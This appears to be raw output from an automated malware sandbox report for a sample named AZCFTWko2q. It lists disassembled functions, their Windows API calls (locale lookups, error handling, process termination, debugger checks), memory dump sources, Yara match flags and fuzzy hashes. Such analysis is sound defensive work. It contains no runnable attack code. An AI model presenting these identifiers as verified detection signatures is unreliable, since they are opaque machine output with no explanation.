  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free
• String ID:
• API String ID: 2834031935-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,024CDAD7), ref: 024EA732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024CDAD7), ref: 024EA73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024CDAD7), ref: 024EA749
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                                      • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00E7
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00EE
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 024F0100
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d41be2cb853779122c00ac3dc7a88bb26d3543edbedc78cf1a7c96cbfde6a7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E0B635000548EFCF626F55DD08A5A7B6AEB86B46F104029FA058B636CB36DA42DE44
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3cf85c9df842f6fd3bc5ce3c7d3ca3eea59eed0ec6bfa2d80cc57b71e0b954be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A63137B6900609DFDB50CF99C880BAEBBF9FF48324F24504AD441A7310D771EA45CBA4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                      • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                                      • Instruction ID: ad229483c852d6ee53efb4250a4e7a18463872af32814c639ad588bae306cc34
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A410876900219AEDB209FB9DC48EBB7779EFC4714F50466AFA05DB280E7319D41CB50
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                      • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                                      • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
• Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
• Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
• Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
• Instruction ID: 4ae49a95b7c64ba767fb8a5f99d323f3de115220bcbad79950cb378f6a254cf8
• Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
• Instruction Fuzzy Hash: 28022D71E002199BEF14CFA9C9906AEF7F1EF88325F15826AD91AE7340D731A945CB80

APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024C262C
• PostQuitMessage.USER32(00000000), ref: 024C27CA
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: MessageNtdllPostProc_QuitWindow
• String ID:
• API String ID: 4264772764-0
• Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction ID: 6ad3a08127dbb01a78909def9183aaaebec7daf78f3187a793ccfc0e069aa659
• Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction Fuzzy Hash: 5C412D25A6434095E730EFA5BC45B2633B0FF64B26F10252FD528CB2B2E3A28540C75E

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024F6F21,?,?,00000008,?,?,024FF3E2,00000000), ref: 024F7153
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 6366081ffb8182c296b9658f943e77cf32c1c022f0677522e99c37241884c123
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: E0B16D312106089FD755CF28C486B66BBE1FF85368F258659E99ACF3A1C339D992CF40

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction ID: 2c75188b5ff96f9cc0cf981139fa8a88b1d74d476f1b10bfc2653860193751ab
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: 27218032A5020AABDF649E25DC41FBB77ADEB8A318F10017FEE01D6250EB79D945CB50

APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
• Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024F0A1C,?,024FBC89,00000000,?,?,?), ref: 024FB5A6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                                      • Instruction ID: d707b3e806164541dfa077f739ff801c7fc3bc8b35c1c4102fec721b69519838
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9311E93A2007059FDB189F39C8A167BBB92FFC575CB15442DDA4687B40D775B542CB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                                      • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024FB87A,00000000,00000000,?), ref: 024FBB08
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 787680540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                                      • Instruction ID: 126c4d58b6a73fb949c0d3614656510d35582df9a768315e6c31bf6f3c62d30d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0F932A00115ABDB689E25CC45BBB7758EB8671CF04046ADF05A3644EB70BE42C6D0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 787680540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                                      • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                                      • Instruction ID: cb97f10e8bbf6354b7b7273f081b0fbefcf6a39b6ea0ca51c015fea75aa770f0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84012632A551059BDB14AF34DD40EBA33A9DF4A311B0441BFEF02DB281DA759D048B54
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024F0A1C,?,024FBC4D,024F0A1C,?,?,?,?,?,024F0A1C,?,?), ref: 024FB61B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                                      • Instruction ID: c65b97290dd3b3519fff1fc5984bec49759590e777e402ff64cfcab3d53944b3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0AF362007045FEB245F39DC81B6A7B95EB86B6CF15442EEB058B650D7B198028A44
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
